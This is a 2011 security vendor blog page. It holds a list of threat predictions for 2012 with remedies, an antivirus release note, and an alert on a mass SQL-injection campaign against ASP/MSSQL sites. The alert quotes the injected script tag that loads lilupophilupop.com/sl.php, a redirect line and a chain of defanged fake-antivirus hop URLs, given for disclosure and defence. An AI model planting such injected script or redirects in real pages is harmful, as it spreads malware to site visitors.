[ General ] 29 December, 2011 17:24

Lionic AegisLab 2012 Security Threat Predictions


    Happy new year to Lionic AegisLab fans. As Santa is just leaving and 2012 is coming, no matter whether it's end of time or end of the world next year, we have to survive on the Internet :-)

 

    In 2011 predictions, we told you that mobile malwares and infrastructure targeted attacks are increasing, and actually it did! And now for the coming year, based on AegisLab research and investigation, we give the advise on the following trends and remedies to protect yourself from being compromised.


1. Mobile Malwares

    In 2011, we faced the threats from mobile devices(smartphones or tablets), such as DroidDream, DroidKungFu and Genimi. The mobile malwares are not like PC viruses infected the other mobile devices proactively, but have the following behaviors:

  • SMS/Call fraud
  • Malvertising
  • Fake famous app (icon seen like Angry Birds or some famous apps else.)
  • Botnet
  • Steal sensitive information (GPS location, contact, IMEI and etc) 

Remedy: Always being aware of suspicious apps and never download from untrusted sources.

 

2. HTML 5 and Web Vulnerabilities

    XSS, SQL injection and CSRF are old-fashioned threats, but still in the top ranking of security events. No doubt, HTML 5 will be the next standard of web application, and with its powerful functions, such as COSR(Cross-Origin Resource Sharing), WebSocket and Offline Applicationm, variuous devices and browsers will adopt HTML5 quickly. HTML5 makes apps write once run anywhere (and vulnerabilities everywhere ?)

 

Remedy: Web programmars should have security awareness and use some tools to verify the codes.

 

3. Social Networks

    Most people can't live without Facebook, Twitter or Google+. The social network become part of your life. Hackers know this and try to lure you. Recently, the free $100 Costco gift card is a facebook fake and many people were fooled . Moreover, CSDN and RenRen's DB were hacked and people's account and password were stolen in mainland China.

 

Remedy: Use complicated password and different passwords in different sites. Check the security risk before following the web links.

 

4. Industrial Control System(ICS) for Utilities

    ICS likes SCADA(Supervisory Control and Data Acquisition) controls water, electricity, oild and gas systems which are essential to people's everyday needs. As we know many industrial control systems are not prepared for cyber attacks. Stuxnet and Duqu are kinds of worms attacking on such systerms. SANS ISC unveiled authentication vulnerabilities about Simens SIMATIC HMI(Human Machine Interface) this month. Smart meter is also being targeted by attackers in the rise.

 

Remedy: Secure hardwares and enforced security policies.

 

5. White Cloud or Black Cloud?

    Cloud computing is a hot topic in recent years, for examples AWS, EC2 and MS Azure. First question is "Is it safe and reliable enough?". Second question is people can pay less money to hire a large computing resources and storages. But who knows if the white cloud becomes a black cloud, what will it be? EAAS(Exploit-as-a-service) is to foment the hacker underground economics.

 

    Web storage and personal cloud will be another security issues. It may encourage piracy, host malicious and porn files. Under insufficient security protection, personal sensitive information may be leaked.

 

Remedy: Don't put personal sensitive information on the cloud, even the cloud vendor says it's safe! Who knows ?

 

6. Attack to Non-PC Devices

    Ubiquitous computing is coming, especially IPv4 addresses are exhausted and IPv6 will apply to every internet connected devices, such as IP camera, IPTV setup box and mobile devices. These kinds of Non-PC devices lack of security functions but they need. No matter these functions are embedded into the devices or in front of the devices, you just can't miss them.

 

Remedy: Secure hardwares and robust software designs.

 

7. APT(Advanced Persistent Attack)

    Operation Aurora, Night Dragon, Shady RAT and LURID are APTs. APT is a kind of targeted attack, especially aims Government, Military defense contractor (i.e. Mitsubishi Heavy Industries), Security company (i.e. RSA). US cyber security experts have reported that 12 groups are behind the bulk of China-based cyber attacks stealing critical data from US companies and government agencies. Iran nulclear event is also a APT attack. APT uses social engineering skills and send mails with attaching .DOC, .PDF or XLS files. While innocent people see the mail subject is important and they concerned, the attachment is not a .EXE, and the antivirus scanner doesn't detect it, they will open it without a doubt.

 

Remedy: Install antivirus and double check the attachment which can be done by VirusTotal, even it comes from a trusted source, the mail "From" may be forged.

 

Finally, wish you happily and safely exploring the world!

By Lionic AegisLab

 

Download English ver. PDF

Download Chinese ver. PDF

 

[ Product News ] 26 December, 2011 18:16


"AegisLab Antivirus Free” New Edition- Support 14 Languages

    The new version v1.0.4, just uploaded to Google Market, now supports total fourteen languages include English, Simplified Chinese, Traditional Chinese, German, French, Spanish, Portuguese, Korean, Japanese, Nederlands, Finnish, Hindi, Malay and Russian. Please go to Google Market and search "AegisLab"!

[ General ] 23 December, 2011 15:29
[ Security Alert ] 02 December, 2011 17:29

    Per ISC diary, SQL injection attack against ASP website and MSSQL are happening. We can find the following string embedded in the web page of victim sites.

    ""></title><script src="hxxp://lilupophilupop.com/sl.php"></script>" 

 

(Figure 1: from ISC diary's comment)

The link inside the malicious "sl.php" changes often:

    window.top.location.replace("hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl");

But we know it will redirect to other hopping sites belong to IP address(194.28.114.102) :

  • hxxp://doutl31inesst.rr.nu
  • hxxp://rthur87seeks.rr.nu
  • hxxp://ift72hbot.rr.nu
  • and more...

And get the content as follows:

    <meta http-equiv="refresh" content="0;url=hxxp://www3.simplerfnetwork.rr.nu/?nhyb3c0y=kt3ixnCYZ6msj93Z0KKljNrYsaifqJHi3OWfZpSWrtacpKCcm6WK" />

Finally, you will see the fake AV scanning page(Figure 2) and lure people to download the installer, the detection rate is rarely low about 16%.

 

(Figure 2) 

The detailed attacking paths are as follows:

[script] hxxp://lilupophilupop.com/sl.php

      [hop] hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl

      [hop] hxxp://www3.simplerfnetwork.rr.nu

      [hop] hxxp://www1.smartscanerjkm.rr.nu

          [download] hxxp://www1.smartscanerjkm.rr.nu

 

Detection rate in VirusTotal (7/43): 

 

Since 02/12/2011,  AegisLab WebGuard can block these malicious sites. 

By AegisLab